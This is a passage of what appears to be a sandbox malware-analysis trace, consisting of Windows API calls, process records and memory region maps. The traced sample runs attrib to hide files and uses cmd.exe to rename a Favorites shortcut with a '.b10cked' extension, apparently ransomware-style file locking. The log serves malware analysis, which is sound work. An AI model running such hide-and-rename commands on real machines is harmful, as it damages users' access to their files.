lpValue=0x2ef0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef01c, lpPreviousValue=0x0) returned 1 [0212.934] GetStartupInfoW (in: lpStartupInfo=0x2eefd8 | out: lpStartupInfo=0x2eefd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.934] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.934] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef078*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef0c4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessInformation=0x2ef0c4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9f4, dwThreadId=0x888)) returned 1 [0212.935] CloseHandle (hObject=0x4c) returned 1 [0212.935] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.935] GetEnvironmentStringsW () returned 0x453760* [0212.935] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0212.935] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0213.261] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2eefb8 | out: lpExitCode=0x2eefb8*=0x0) returned 1 [0213.261] CloseHandle (hObject=0x50) returned 1 [0213.261] _vsnwprintf (in: _Buffer=0x2ef100, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eefc4 | out: _Buffer="00000000") returned 8 [0213.261] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0213.261] GetEnvironmentStringsW () returned 0x453760* [0213.261] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0213.261] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.262] GetEnvironmentStringsW () returned 0x453760* [0213.262] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0213.262] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef01c | out: lpAttributeList=0x2ef01c) [0213.262] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.262] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.262] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.262] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.262] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.262] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.262] SetConsoleInputExeNameW () returned 0x1 [0213.262] GetConsoleOutputCP () returned 0x1b5 [0213.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.262] exit (_Code=0) Process: id = "521" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31287 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31288 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31289 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31290 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 31291 start_va = 0x880000 end_va = 0x886fff entry_point = 0x880000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31292 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31293 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31294 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31295 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31296 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31297 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31298 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31299 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31300 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31301 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31302 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31303 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31304 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31305 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31306 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31307 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31308 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31309 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31310 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31311 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31314 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 31315 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 722 os_tid = 0xab0 Process: id = "522" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31317 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31318 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31319 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31320 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31321 start_va = 0xb50000 end_va = 0xb56fff entry_point = 0xb50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31322 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31323 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31324 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31325 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31326 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31327 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31328 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31329 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31330 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 31331 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 31332 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31333 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31334 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31335 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31336 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31337 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31338 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31339 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31340 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31341 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31342 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31343 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31344 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 31345 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31346 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 723 os_tid = 0x98c Process: id = "523" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31347 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31348 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31349 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31350 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 31351 start_va = 0x2e0000 end_va = 0x2e6fff entry_point = 0x2e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31352 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31353 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31354 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31355 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 31356 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31358 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31359 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 31361 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31362 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31363 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31364 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31367 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31369 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31371 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31372 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31373 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31374 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 31375 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31376 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 724 os_tid = 0x888 Process: id = "524" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16940" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31389 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31390 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31391 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31392 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31393 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31394 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31395 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31396 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31397 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 31398 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31459 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31460 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31461 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31462 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 31463 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 31464 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31465 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31466 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31467 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31468 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31469 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31470 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31471 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31472 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31473 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 31474 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") 